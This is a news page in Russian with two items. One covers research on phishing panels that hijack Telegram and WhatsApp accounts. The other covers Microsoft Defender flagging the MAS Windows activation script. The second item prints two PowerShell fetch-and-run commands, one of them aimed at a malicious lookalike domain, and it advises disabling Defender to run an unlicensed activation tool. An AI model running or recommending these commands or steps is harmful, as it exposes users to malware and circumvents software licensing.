Угонщики Telegram- и WhatsApp-учёток могу зарабатывать до 2,5 млн в месяц

Угонщики Telegram- и WhatsApp-учёток могу зарабатывать до 2,5 млн в месяц

Угонщики Telegram- и WhatsApp-учёток могу зарабатывать до 2,5 млн в месяц

Исследователи из F.A.C.C.T. изучили работу фишинговых веб-панелей, с помощью которых киберпреступники угоняют аккаунты россиян в мессенджерах, и пришли к выводу, что злоумышленники могут зарабатывать таким образом приличные деньги — до 2 500 000 рублей в месяц.

Чаще всего страдают владельцы учётных записей Telegram и WhatsApp (принадлежит Meta, признанной экстремистской и запрещенной в РФ).

Например, с одной панели в первом полугодии 2024-го киберпреступники создали не менее 900 ресурсов, помогающих перехватывать контроль над аккаунтами граждан.

Аналитики CERT-F.A.C.C.T. отмечают волнообразный характер таких атак. Telegram-аккаунты фишеры начали угонять ещё в декабре 2022 года. За это время функциональные возможности и автоматизация фишинговых веб-панелей заметно подросли.

Специалисты выявили в общей сложности шесть веб-панелей, которые злоумышленники используют для создания фишинговых ресурсов. Почти все они были нацелены на кражу учёток Telegram, лишь одна панель «отрабатывала» пользователей WhatsApp.

В период с января по июнь 2024 года одна такая панель смогла выдать более 900 веб-сайтов. Наиболее часто встречаются фишинговые страницы в доменах .ru, .online, .shop, .site, .website.

Интересно, что киберпреступники теперь выводят деньги не только с помощью денежных призов, бесплатных подписок и тому подобного, но и через относительно новые способы: игру Hamster Kombat и фейковый сервис с нейросетью «Раздень подругу».

На соответствующих форумах можно продать логи в среднем за 150 рублей. Прибыль наиболее опытного «угонщика» может составлять от 600 000 до 2 500 000 рублей в месяц.

Напомним, в этом месяце мы сообщали о прибыли мошенников, работающих по схеме «Мамонт». В период с июля 2023 года по июнь 2024-го они суммарно украли у граждан более 1,2 млрд рублей.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru